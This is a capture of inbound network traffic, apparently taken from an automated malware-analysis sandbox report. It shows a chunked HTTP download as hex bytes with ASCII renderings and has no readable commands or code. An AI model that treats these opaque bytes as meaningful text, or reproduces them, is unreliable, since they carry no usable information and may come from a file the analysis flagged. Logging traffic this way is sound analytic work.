@MDgkeut<w\|'z[rVq/#(+u9WiVWlwyW
2023-07-27 18:19:34 UTC	773	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	773	IN	Data Raw: 81 22 de 2f 83 56 2a 72 c8 dd b0 66 78 9a 6f 25 08 8d f6 77 65 66 b4 93 22 35 01 79 fb 10 16 28 40 15 3c 4e ba e3 6d b5 84 41 eb b5 6d a5 56 bd f6 fa 35 82 b8 2e 00 5f e9 fe 47 08 10 46 fa 65 b9 18 10 b8 23 27 5a 77 f4 2a fc cd b0 79 64 18 ca 45 e6 70 1a 0f 0f d5 9d 08 aa 10 7c 87 4f 15 0b 7e a3 63 01 12 5c 6d d2 68 b7 15 38 56 ce 98 1c c2 a3 81 80 f2 e2 62 b2 2b 5a 41 8a f0 72 b9 ad 29 40 7e 1e be 6f cc d0 dd d1 43 b5 74 b6 1e 1f 9b 46 47 ef e4 fc 0c 92 a8 ff 28 d2 f4 1d 41 23 42 05 6a be dc cf ea 56 d4 d6 a8 ed 12 3f 19 2d f5 15 fe 54 8f 03 85 56 44 a6 80 66 bf 88 c9 85 78 15 fb 37 4a 2d e8 18 be ce ad 4b 87 8f d1 e4 be 5d 73 08 3f 0f fd 71 f2 cf 17 4f 31 f3 19 34 f7 03 db 9c d9 22 ae 50 44 36 48 f1 ff 70 15 9c fe 90 9d 52 f5 1b ed cf 71 9e 91 a8 90 ca Data Ascii: "/Vrfxo%wef"5y(@<NmAmV5._GFe#'ZwydEp\|O~c\mh8Vb+ZAr)@~oCtFG(A#BjV?-TVDfx7J-K]s?qO14"PD6HpRq
2023-07-27 18:19:34 UTC	781	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	781	IN	Data Raw: 32 30 30 30 0d 0a 67 4c 1f 6e 6f f9 a3 35 69 fb 5a a7 2f ac 04 3f 5d a0 e3 3b cf bc 71 2e d6 2c fc 16 1a 0c 29 e2 7f c7 47 4d 12 cc 83 a3 a7 6e 52 8e e8 02 ef ea 6a af 14 46 2b f3 77 ef c3 f6 d3 9a 12 5e ea 2e 5e 25 3f 25 78 9e 03 07 b9 71 21 eb 35 c1 c9 18 a0 fe d6 fe 74 11 cb b7 05 b4 55 94 68 c7 bc ab 27 96 3c 2c fe bc c1 6c 71 1b ea 4a f6 2d 03 77 f6 37 8b bf c7 40 50 29 9c cf 47 d0 da 24 3a 08 c8 d2 04 28 43 3c 85 d1 ef 88 fc d6 1d d1 e9 39 99 36 71 73 c2 0d 5b 96 9e 18 67 65 0a 34 66 0f 42 da e9 9b 01 20 df 44 81 75 3e 64 b8 79 c5 ac 80 fd b5 ed d7 99 e8 85 0d 93 78 a9 69 0f 90 ff ad c3 dd 43 a0 aa 2c 70 ec c7 1c 91 c2 bb 17 4f 6b c5 ff 6f 71 b6 03 39 02 fe 67 3b 20 58 46 f6 a9 91 4a 4b f9 e1 0a 38 78 74 48 0a 51 37 85 8e f4 e6 24 90 c5 8c af 8a 88 Data Ascii: 2000gLno5iZ/?];q.,)GMnRjF+w^.^%?%xq!5tUh'<,lqJ-w7@P)G$:(C<96qs[ge4fB Du>dyxiC,pOkoq9g; XFJK8xtHQ7$
2023-07-27 18:19:34 UTC	789	IN	Data Raw: ea 70 c6 a8 e0 02 Data Ascii: p
2023-07-27 18:19:34 UTC	789	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	789	IN	Data Raw: 32 30 30 30 0d 0a 99 7b 08 4e d9 6b 48 5f 25 75 da 14 68 3d 83 7f 59 a2 fd d2 69 eb 37 68 20 bc b2 09 bf 21 09 79 b6 53 98 c0 ce 14 cd 9e fb e8 f4 da 31 43 65 d5 7b 57 bc 93 19 1b 39 41 ed 3a 3d 37 db 8a ec d8 40 39 e5 65 91 57 92 4f c4 8d 74 11 af 3d 7b c4 e7 ff 8d c3 bd db fc b7 54 c2 5b 52 5e 42 26 c5 20 59 66 b6 a9 e1 d9 0c c7 7f 27 5c 95 cc 2f 54 fd be 9e 10 3f 31 ee e1 a9 87 95 fd a6 96 82 ef 13 12 2d 07 7a 6e 6f b0 5b ab 73 d5 55 1f 76 07 21 0e ca 30 3b 85 20 aa f8 a5 0a ac 0a 6c 11 45 03 6e b6 ad a1 77 76 96 58 24 df 8e 23 da 26 72 85 4b 94 2f 59 d5 08 be a1 cd b1 b8 a6 db 1b 85 1a b8 6a b0 a7 e3 ec 3c 0e ff 75 8a 79 48 e3 05 e4 a8 75 45 f5 f3 74 0d 31 4a f2 29 49 e3 7e 51 aa 5a 82 a3 28 80 3f f9 d0 f2 96 8f be 2b 88 28 25 1b 42 42 1d 65 9f 1b 41 Data Ascii: 2000{NkH_%uh=Yi7h !yS1Ce{W9A:=7@9eWOt={T[R^B& Yf'\/T?1-zno[sUv!0; lEnwvX$#&rK/Yj<uyHuEt1J)I~QZ(?+(%BBeA
2023-07-27 18:19:34 UTC	797	IN	Data Raw: 40 e9 96 cb 79 8d Data Ascii: @y
2023-07-27 18:19:34 UTC	797	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	797	IN	Data Raw: 32 30 30 30 0d 0a 9b f4 1d 16 60 2c 63 5a 9a db 38 dd 71 85 9c 28 dc 70 cf 00 25 b2 76 ec 34 c2 9b d8 be 19 a7 50 96 32 0d 99 a8 5e 84 44 e6 de d6 49 fd 37 bc a6 81 2b fc dc ea be 3e f9 82 cf a0 ce b5 08 45 d9 16 40 15 43 f7 bd 36 6f ef 66 c2 dd c6 0c f4 73 a2 1a 6b ca b0 5c 94 cf 28 1b 6e d9 59 b6 d6 cb 2f a4 78 f3 5d 32 c5 eb 3c 4f e3 03 54 c6 3d fc e2 7b 26 da f9 79 46 73 d0 66 19 45 b3 38 d5 2b f2 0a c4 bd 08 83 9e 85 ce 94 5e 2d dc 57 7e 05 53 2c 31 a0 5a 7c 6d b3 fc 51 ed d7 73 97 ed 75 85 a7 68 5d 54 91 c3 0c cb 05 72 a8 e9 f8 22 e5 c3 5b db 6b 90 6d ad 0d 65 3d 39 fb 83 b6 14 0a 6d 00 f6 9b 38 91 4f 8d 3f 64 99 43 95 28 8e e3 59 59 31 ce 99 55 32 42 81 ba 67 21 ba d9 68 a8 2f 18 41 33 17 bd 78 ce 52 b7 58 e3 71 15 f0 22 46 88 4b a2 db fd 05 41 45 Data Ascii: 2000`,cZ8q(p%v4P2^DI7+>E@C6ofsk\(nY/x]2<OT={&yFsfE8+^-W~S,1Z\|mQsuh]Tr"[kme=9m8O?dC(YY1U2Bg!h/A3xRXq"FKAE
2023-07-27 18:19:34 UTC	805	IN	Data Raw: c6 43 73 82 9a 48 Data Ascii: CsH
2023-07-27 18:19:34 UTC	805	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	805	IN	Data Raw: 32 30 30 30 0d 0a 8b 59 06 c1 55 c6 02 62 0e de 10 67 98 8a dd 30 2b ea 39 66 ba 85 77 3f 74 5d 0c f6 8f f4 5c ea 74 66 1a 70 83 6e bc d3 3a f0 1f 6d e5 9e 41 a5 a0 f6 5a d7 a4 a7 05 b4 29 bd 21 f1 97 c8 8d 49 11 6b a5 e3 8b 79 3b d1 5e 40 4f 7a c3 a6 96 2c a0 75 7a 94 4d 6c 99 ec d3 95 6a 32 e7 b2 5b a5 64 e8 f1 75 90 0e 44 a0 b4 67 4f 12 5a f3 0e 84 4b d3 2f 36 47 51 ab b8 08 18 ec e9 7d 53 61 63 d9 55 fe a2 4e 00 17 03 e6 ee d7 c5 eb 8b 3c a8 7c 10 11 42 78 a7 10 1f c4 73 8b e9 c5 87 c5 84 fe ef 4d ce 6f b8 b0 5b 1f b5 4d 46 f7 75 86 a3 90 63 0d 2e 6f a7 1f 2d e7 8d 81 11 ab 1b 06 d2 67 65 a4 f5 fb 41 92 a6 a3 c0 8f 83 60 9d 29 3b 11 4a 6f c6 f9 93 f5 d9 d7 aa c2 9d ad a3 e9 d6 80 14 23 11 3b 98 96 fe 19 a8 2e d1 00 70 d4 7d 7f 39 0e c5 57 e8 72 ce 51 Data Ascii: 2000YUbg0+9fw?t]\tfpn:mAZ)!Iky;^@Oz,uzMlj2[duDgOZK/6GQ}SacUN<\|BxsMo[MFuc.o-geA`);Jo#;.p}9WrQ
2023-07-27 18:19:34 UTC	813	IN	Data Raw: 28 ae 94 47 53 85 Data Ascii: (GS
2023-07-27 18:19:34 UTC	813	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	813	IN	Data Raw: 32 30 30 30 0d 0a 7f 07 33 a2 55 d2 84 ae d7 47 9c 44 17 19 41 94 24 34 fc 70 01 71 8c ac 97 cd e5 a2 8b 21 02 a8 27 04 34 ae b2 48 81 33 c0 73 21 91 94 66 08 85 e2 6f 4a 10 02 8a 66 dc 77 c6 e3 7a 39 56 2d a2 73 45 4f 25 2f ec 9b 65 35 f3 d4 da bd 4d 70 53 7d 0f 19 f2 7c cd 2e e9 52 59 39 8d 7c 48 06 bb 59 ab d6 09 5a 60 38 56 b7 a0 c7 0a dc 86 d2 7d e1 92 8e 0e 95 84 b5 26 64 8c 23 fe 2c cc ee 6a cd 96 7e 55 43 f7 22 a6 c5 03 80 f1 92 c0 78 7d e4 d3 1a 46 ee 26 86 d4 01 12 13 93 10 68 12 d6 00 c9 2f 74 3d 5d e5 5d b3 45 7e bb cd 61 1c c9 a0 43 7b b3 49 26 a7 f4 5e 76 45 93 3c 98 3e 4f 44 60 b1 17 ab 68 89 19 00 8a 7a 46 aa ac 45 45 80 5a 78 b0 16 df 30 5c 8f ac 2c f2 ce c2 72 8b db 17 e5 a5 ea 17 1e 70 c5 08 5e 62 ae f0 7c f2 11 2b 2c 12 08 00 e7 50 54 Data Ascii: 20003UGDA$4pq!'4H3s!foJfwz9V-sEO%/e5MpS}\|.RY9\|HYZ`8V}&d#,j~UC"x}F&h/t=]]E~aC{I&^vE<>OD`hzFEEZx0\,rp^b\|+,PT
2023-07-27 18:19:34 UTC	821	IN	Data Raw: da 9c fa 91 8d 31 Data Ascii: 1
2023-07-27 18:19:34 UTC	821	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	821	IN	Data Raw: 32 30 30 30 0d 0a 04 07 6b e5 d1 22 7c 35 0e dc 1d 4c 76 94 45 1d ac 3d d0 e9 6e 87 c1 3c 96 f8 46 54 40 78 86 e6 8c 0c dc 60 01 17 b6 1b 17 c3 ed d9 72 99 2c f1 2f 9a ae 31 7a 0d 2e 4c 44 c1 86 b6 26 63 5b 81 45 36 62 cd 90 b7 ed 25 72 90 da 99 4f c5 5f 73 ca 74 1d ff 7d ca 34 75 2d 22 90 8d 41 f5 1b db 01 c3 07 eb 9c f3 64 a1 fb dc 25 cd ec 67 a3 df c2 c0 85 8b a7 d5 61 5a c7 dc d1 d0 86 ad 1a 4a f4 89 e7 b5 94 e3 bf c5 fe 25 cf c9 ad d2 7f ee b2 76 fa a7 b4 fe 61 c0 af 36 ac d1 2f b1 7d 25 15 8f 20 df 31 cd 99 a4 18 e9 b5 e6 ab 64 1e 6c df 05 ef dd 1d c9 30 c0 86 64 88 00 7c fb 4a 0b 01 ec d7 c3 8f 4e b7 4c 0b 14 2c ca af c1 96 cb 6e 92 f0 91 7d fc eb 36 eb 4d c8 e6 e1 db 72 5b e5 9d 9a 7d 5e 38 22 9f ea 1f 73 6e fb b1 7b 49 33 27 0e 89 dd 22 be 6e ee Data Ascii: 2000k"\|5LvE=n<FT@x`r,/1z.LD&c[E6b%rO_st}4u-"Ad%gaZJ%va6/}% 1dl0d\|JNL,n}6Mr[}^8"sn{I3'"n
2023-07-27 18:19:34 UTC	829	IN	Data Raw: dc 78 7e 04 48 75 Data Ascii: x~Hu
2023-07-27 18:19:34 UTC	829	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	829	IN	Data Raw: 31 66 66 38 0d 0a 96 c0 42 62 5c 41 30 77 3c 53 f5 eb 89 fc 5d 82 7d bb 66 de 22 5a 22 40 83 bb 63 14 d3 45 fa 4f 3c a9 95 48 ed a0 51 93 ca f8 2e 1e 65 bb 6e 7d 4d 70 e6 b9 18 2e b2 99 6f 99 79 9c 06 76 7e 2d e6 fb 1f 85 76 90 d9 8b 06 50 32 4c aa 1f c4 59 51 25 d7 83 ec 8a bd 41 b6 41 03 db f8 2c f8 07 46 5a 2e 9b 60 87 63 b3 46 91 8a 14 4a 1b 04 cc 51 c9 b9 93 5c 32 90 77 5f d6 dc ad 7b af c6 16 da 00 b3 50 7d d2 54 46 9a ee 47 aa d9 25 4d 51 c4 68 17 9b 82 3a d2 cb bb 23 94 ed 66 15 c5 c7 64 1f 85 8d c0 d7 d0 82 ea 61 dc 16 1a 65 29 89 da 3d e7 c2 e4 cf e5 c3 87 7e 5d d5 92 31 53 d5 3e 84 d5 42 1f 2f 0b 4c 4c bc de ce 19 df 9f b0 17 3c 63 55 37 7f 2b 11 ed c5 64 23 2f a6 66 dd c1 32 df 60 5a 49 e3 08 d8 38 91 64 f5 6d 35 bf 14 4d 15 d2 f2 1c 36 c1 8f Data Ascii: 1ff8Bb\A0w<S]}f"Z"@cEO<HQ.en}Mp.oyv~-vP2LYQ%AA,FZ.`cFJQ\2w_{P}TFG%MQh:#fdae)=~]1S>B/LL<cU7+d#/f2`ZI8dm5M6
2023-07-27 18:19:34 UTC	837	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	837	IN	Data Raw: 70 ee 17 0e 7b 55 eb 15 b7 99 f8 09 87 6c 8a a7 c3 f2 56 bd 52 7f c3 8c 2b c7 d4 e2 d2 48 6e 8a 65 76 c4 07 20 49 c2 f8 81 db 6e 4b 04 cc e7 ed 6b ab 07 34 8d cd bc 11 dd 19 67 91 37 fc 0c 68 c1 39 f9 41 36 05 c6 a2 cb 31 3c a4 a9 9d ea c7 71 ab 29 07 2f 1d 7d d1 e9 40 69 d5 25 1e 62 6f a4 06 63 9b 5e b7 be 3e 1a 27 16 96 86 a9 db fa 5a 9e ec 13 8c 46 2b 79 df 17 0d c5 b5 db 13 a9 ce 78 7b 29 81 a9 0e 90 c1 b0 68 21 7c 76 5e c1 53 e5 cd d3 39 93 2e dc 76 df f3 91 f0 57 3b 1b 97 c3 0d 69 56 a4 58 33 51 fd a5 3a 46 e5 61 7f 3f ac 19 d1 98 f9 e8 00 a6 a5 1d d8 2f a5 7f 45 c6 60 69 06 ba 52 f0 0c 6f 32 f2 4b 1b 9c 4b f7 bc 08 46 35 80 79 28 0c f1 6f de dd 31 ec 91 7d 36 a0 ed 67 01 bb b1 36 16 ac 78 f6 29 14 b2 33 2b 80 62 b7 be eb 2c e1 9d 38 7a fd 6b 8f cf Data Ascii: p{UlVR+Hnev InKk4g7h9A61<q)/}@i%boc^>'ZF+yx{)h!\|v^S9.vW;iVX3Q:Fa?/E`iRo2KKF5y(o1}6g6x)3+b,8zk
2023-07-27 18:19:34 UTC	845	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	845	IN	Data Raw: 32 30 30 30 0d 0a b1 5c 71 4a 69 3b e1 b4 ac 50 86 b4 8d 92 8b a2 0b 70 ee d3 e5 b8 19 6d e6 31 f8 d0 ca bc f5 bb 64 32 b0 29 b5 f4 9e 35 30 46 04 b4 14 89 98 bc c5 36 69 4d ea 0c 2b 4a a4 97 0d 57 6e 0f e1 83 c7 c1 7d c7 ca f6 d3 3d 89 7e 9a 8b ce 2f 22 b7 73 01 ce 84 78 f0 80 14 ca 94 15 a5 0a 0d 13 62 cf fd 45 03 0c 25 05 b7 4b 0e 90 4a 57 b4 9b 3f 45 35 5e 23 cd 1c 77 84 e4 99 e2 8b b7 68 16 fe a4 10 64 04 60 d8 d3 24 59 b6 34 02 55 77 ad e6 81 98 39 b2 3c 14 8e 43 73 94 5a 0c a8 96 6e 80 9b 1c d8 7a 6a 16 fe 0f cf ba ed b5 97 16 c4 20 6c a6 30 57 84 36 c7 18 aa ed 3b 30 60 0f 0f 7c 77 11 10 96 24 1d 86 09 76 d9 ac d0 96 f7 31 c5 9a 7b 3c 12 30 3a 56 c0 2e fb 76 b1 c3 f6 18 81 5a 6a 7b 88 2e dd c0 54 02 ea a7 c8 7c bd 75 7c 16 d6 66 d4 61 cf 45 e9 10 Data Ascii: 2000\qJi;Ppm1d2)50F6iM+JWn}=~/"sxbE%KJW?E5^#whd`$Y4Uw9<CsZnzj l0W6;0`\|w$v1{<0:V.vZj{.T\|u\|faE
2023-07-27 18:19:34 UTC	853	IN	Data Raw: a6 75 1b 56 c4 21 Data Ascii: uV!
2023-07-27 18:19:34 UTC	853	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	853	IN	Data Raw: 32 30 30 30 0d 0a ed 50 a6 64 80 62 c4 67 4a 28 6d c3 50 00 33 1f 9d 8d 56 a0 5a a0 e0 4b 51 42 a4 55 c0 48 1e 2c 07 c9 bf c5 04 99 53 79 df fd e4 2c f9 79 4a 06 51 32 b1 43 fd 20 48 33 3d 37 08 ad 4c b6 b3 91 d4 be c6 21 d9 e5 2c 8b 4b f7 76 6a 58 67 5b 2d 46 d1 1d d2 2b 7c 61 73 d3 66 22 33 71 d0 3f 9e fe fd ac f2 0c 5b 10 b7 f8 4e 1d e3 a0 e4 62 0e 22 3f 74 c2 19 8d d0 f4 a0 0f dd 76 a9 2d b7 17 87 e8 03 4b fb d9 03 f6 58 28 59 2e 99 81 fc 3f 73 1b dd ed e2 18 4d df 7d 40 eb 1f b5 20 33 32 a9 1a 6d b9 0a 9d 4e 2a b9 c6 ae 27 ca 8c b0 38 f4 6f 4e 43 b0 cc 16 fb 02 8f 96 87 13 ed 04 26 9a 1a 29 b9 3a ed 59 96 89 c8 82 f8 9b 2b b8 64 ee 4c 93 98 2a cf c8 a3 25 73 4e 7f 64 e0 59 7f 2d ef 89 ef 50 a9 7d b6 dd 9b ef 87 41 21 cf e8 0d ac 3e d7 fe 2c f1 4c ef Data Ascii: 2000PdbgJ(mP3VZKQBUH,Sy,yJQ2C H3=7L!,KvjXg[-F+\|asf"3q?[Nb"?tv-KX(Y.?sM}@ 32mN'8oNC&):Y+dL%sNdY-P}A!>,L
2023-07-27 18:19:34 UTC	861	IN	Data Raw: 3b 6e 46 5a 94 0d Data Ascii: ;nFZ
2023-07-27 18:19:34 UTC	861	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	861	IN	Data Raw: 32 30 30 30 0d 0a 5c 5b 6f 90 a3 77 a0 42 e6 43 2d cc 29 dc 20 03 1c f5 f0 3d b3 48 7e 1c af 02 1f 08 b8 48 ec 5a 18 a6 ee 37 38 a9 65 64 14 a7 b3 78 12 9d a9 52 9a 97 31 bc 3e 65 2e ba 37 e4 9a ed e2 97 ab dc d1 15 56 74 d2 a3 38 a9 2b 22 eb 42 87 ab f2 54 81 a5 39 c7 b3 d1 07 0d 11 bb 81 94 78 3b 95 ed 62 8d fd c2 bd 0d c6 80 69 f0 e3 a0 98 4a a3 64 a5 e8 4d af 3f 52 d8 3b 0d f1 de ee 74 67 32 97 2e 72 7d 1c 03 8a 48 3f 1b 61 fd 9e 52 9c 15 13 51 4b 96 96 14 f3 98 9f 5b f5 ee fe a2 0d 05 98 af 9f 12 da 24 46 11 41 ce fa 61 13 2a bf 25 c4 56 e9 43 4c 89 52 94 39 26 ca fe c1 25 0c e8 89 b1 aa 23 45 e0 a5 48 53 c7 aa 9e ad ba f7 c4 0b 87 5f 96 e7 5f 98 18 a7 bc f2 84 8e e5 54 24 36 23 b2 19 82 50 1c df 9b b4 6f 77 b1 ac bd d3 f3 00 74 9d 8f c9 c3 65 01 c4 Data Ascii: 2000\[owBC-) =H~HZ78edxR1>e.7Vt8+"BT9x;biJdM?R;tg2.r}H?aRQK[$FAa*%VCLR9&%#EHS__T$6#Powte
2023-07-27 18:19:34 UTC	869	IN	Data Raw: ac 8e e3 41 58 90 Data Ascii: AX
2023-07-27 18:19:34 UTC	869	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	869	IN	Data Raw: 32 30 30 30 0d 0a 11 4c 71 a0 7d dc 7d 5f 8f ff cd b5 eb 48 7b df 8f e4 c5 a1 ba 62 66 1f 10 e6 2c bf 08 cb f2 3c a0 bd 09 1c 45 54 df 83 2f d6 4e 63 ac 8e bc 16 45 bf b7 44 a8 de 14 62 97 f2 71 bd 79 77 24 3f c8 cd 92 a9 35 ca 14 6c 30 7b 9e f4 38 84 8f 1f 98 cb 5e 10 2e ab 9b 92 9c a8 56 19 73 ac 59 f6 6d 33 df 2d 25 cc 5e 2b 31 50 42 93 9a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000Lq}}_H{bf,<ET/NcEDbqyw$?5l0{8^.VsYm3-%^+1PB
2023-07-27 18:19:34 UTC	877	IN	Data Raw: 79 7c 80 7d 7c 7c Data Ascii: y\|}\|\|
2023-07-27 18:19:34 UTC	877	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	877	IN	Data Raw: 32 30 30 30 0d 0a 85 80 7e 7d 83 7e 7f 85 85 80 80 7d 7d 80 83 7c 81 80 82 84 7f 80 81 79 79 7f 83 83 83 7a 7b 79 81 81 7c 7e 7b 7b 82 86 86 7c 83 80 7f 80 86 82 7c 83 7e 7f 84 84 81 80 7c 85 81 7e 80 81 81 7b 7b 82 84 7f 7f 7d 7d 7d 80 82 7f 7e 84 84 84 85 80 82 7e 7d 7c 7d 7d 80 7d 83 7c 7b 81 7e 7d 86 84 81 7e 85 7c 84 7b 82 83 85 79 81 7d 84 7c 7f 81 7d 84 84 81 85 7d 83 7a 84 85 7e 80 7d 7e 7b 80 80 86 80 82 7a 7c 7d 84 7b 84 81 82 80 7b 7b 7c 7f 82 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7f 7c 7d 7b 7c 7c 7f 7c 82 7b 7d 7f 7d 83 82 7e 7f 84 7f 7e 80 80 7e 85 80 7a 7d 7e 81 81 7d 7e 81 7f 84 7f 7f 83 85 83 81 81 7c 81 84 81 82 85 7f 7c 80 7d 7b 83 85 7a 7a 84 80 81 86 7f 7e 7f Data Ascii: 2000~}~}}\|yyz{y\|~{{\|\|~\|~{{}}}~~}\|}}}\|{~}~\|{y}\|}}z~}~{z\|}{{{\|\|\|}{\|\|\|{}}~~~z}~}~\|\|}{zz~
2023-07-27 18:19:34 UTC	885	IN	Data Raw: 7e 00 80 7e 7f 00 Data Ascii: ~~
2023-07-27 18:19:34 UTC	885	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	885	IN	Data Raw: 32 30 30 30 0d 0a 80 7e 7f 00 80 80 80 00 80 80 80 00 81 7e 7e 00 7f 81 81 00 7f 7f 7f 00 7f 7f 7f 00 7f 7f 81 00 7e 81 80 00 81 81 80 00 7e 80 80 00 7f 7f 80 00 80 7f 7e 00 7f 7f 80 00 81 80 7f 00 7e 7e 7f 00 7f 7f 80 00 80 7e 7f 00 7e 80 80 00 7f 7f 7f 00 7e 7e 7e 00 7e 80 7f 00 81 81 7e 00 7f 80 7e 00 7f 80 7f 00 80 7e 80 00 81 7f 7f 00 81 80 80 00 80 7f 7f 00 7e 81 7f 00 80 7f 7e 00 7f 80 7f 00 80 80 81 00 80 80 7e 00 80 7f 81 00 80 7f 7f 00 80 7e 80 00 7f 80 7f 00 81 80 7f 00 7f 7f 81 00 80 7f 7f 00 7f 81 7f 00 81 80 7f 00 80 81 7f 00 81 80 80 00 7f 81 80 00 7f 7f 7f 00 80 7f 81 00 80 81 81 00 7e 7e 7f 00 7f 7f 7f 00 81 7f 7f 00 80 80 80 00 7f 80 80 00 80 80 80 00 80 7f 81 00 80 80 7f 00 7e 7f 80 00 7e 80 7f 00 7e 7f 81 00 7f 7f 7f 00 7f 80 7f 00 7e Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:19:34 UTC	893	IN	Data Raw: 7e 81 7f 7f 80 7f Data Ascii: ~
2023-07-27 18:19:34 UTC	893	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	893	IN	Data Raw: 31 66 66 38 0d 0a 7f 80 81 80 81 7f 81 7f 80 7e 7f 7f 80 7f 80 81 7f 7f 80 7f 7f 80 7f 80 7f 80 80 81 80 7f 7f 80 80 7f 81 7e 81 7f 80 80 80 7f 7f 80 7f 81 7f 81 7f 80 80 7f 80 7e 7f 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 81 81 7f 81 7e 81 80 7e 80 7e 80 81 81 7f 81 7f 7e 7e 7e 80 80 7f 7f 7e 7f 7f 7e 81 81 81 81 80 80 7f 80 7f 7f 80 7e 80 7f 7f 80 80 81 7f 7f 80 80 7f 7f 7f 80 80 7e 81 80 80 81 80 81 80 80 80 7f 7f 81 7f 7e 7f 80 7e 7f 7f 7f 7f 7f 80 80 7e 7f 80 7e 7f 80 7f 7f 7f 7e 7e 81 81 7f 7e 80 81 7f 7f 00 00 00 00 00 Data Ascii: 1ff8~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:19:34 UTC	901	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-07-27 18:19:34 UTC	901	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7f 7f 80 80 7e 7e 80 80 81 7f 7e 81 7f 81 80 81 7e 81 7f 80 81 7f 7f 7e 81 80 7f 7f 7e 80 80 80 7f 7e 80 7f 7e 80 80 7e 7f 7e 7f 81 80 80 7f 80 7f 7f 7f 7e 81 80 7e 80 7e 80 80 7e 81 7f 80 80 7e 7f 7f 80 80 81 7f 81 80 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7f 7f 7f 7f 7f 7e 81 7f 80 7f 81 80 7f 7f 7f 7e 80 7f 7e 80 81 7e 80 7e 80 81 7f 7f 7f 80 7f 7f 80 81 7e 81 7f 80 7e 7e 80 81 80 80 7f 80 80 80 7f 7f 7e 80 80 80 81 80 7f 7f 81 7f 80 7f 80 80 80 7f 7f 80 7f 7f 81 80 80 7e 81 80 80 81 7f 80 81 Data Ascii: ~~~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:19:34 UTC	909	IN	Data Raw: 0d 0a Data Ascii:
2023-07-27 18:19:34 UTC	909	IN	Data Raw: 32 30 30 30 0d 0a 80 80 81 00 7f 80 7f 00 7f 80 81 00 80 80 81 00 80 80 7e 00 7f 7f 80 00 7f 7e 80 00 7f 80 80 00 81 80 7f 00 7f 7f 7e 00 7f 7f 80 00 7f 7e 80 00 7e 80 7f 00 80 7e 7f 00 81 7f 7f 00 80 81 7f 00 80 7f 80 00 80 7f 7e 00 80 81 7e 00 81 81 7f 00 80 80 80 00 7e 80 80 00 80 80 7f 00 80 80 80 00 80 80 80 00 7f 80 81 00 7f 7f 80 00 81 80 80 00 81 7f 7f 00 81 7f 81 00 7f 7f 7f 00 80 80 7f 00 81 80 80 00 81 80 81 00 80 81 7e 00 80 7f 80 00 7e 7f 7f 00 7f 81 7f 00 80 7f 7f 00 81 7f 81 00 81 81 80 00 7f 7e 80 00 7f 7f 81 00 81 80 7f 00 7f 7e 80 00 7f 80 7f 00 80 7f 80 00 80 80 80 00 81 80 81 00 7f 7f 7e 00 7e 81 81 00 81 7e 80 00 7e 80 80 00 7f 80 7f 00 81 81 7f 00 7f 80 7e 00 7f 80 81 00 80 7f 81 00 7f 7f 7e 00 7e 7e 7e 00 80 81 7f 00 81 7f 7e 00 80 Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~
2023-07-27 18:19:34 UTC	917	IN	Data Raw: 6c 5a 4a f1 55 e0 Data Ascii: lZJU
2023-07-27 18:19:34 UTC	917	IN	Data Raw: 0d 0a Data Ascii:
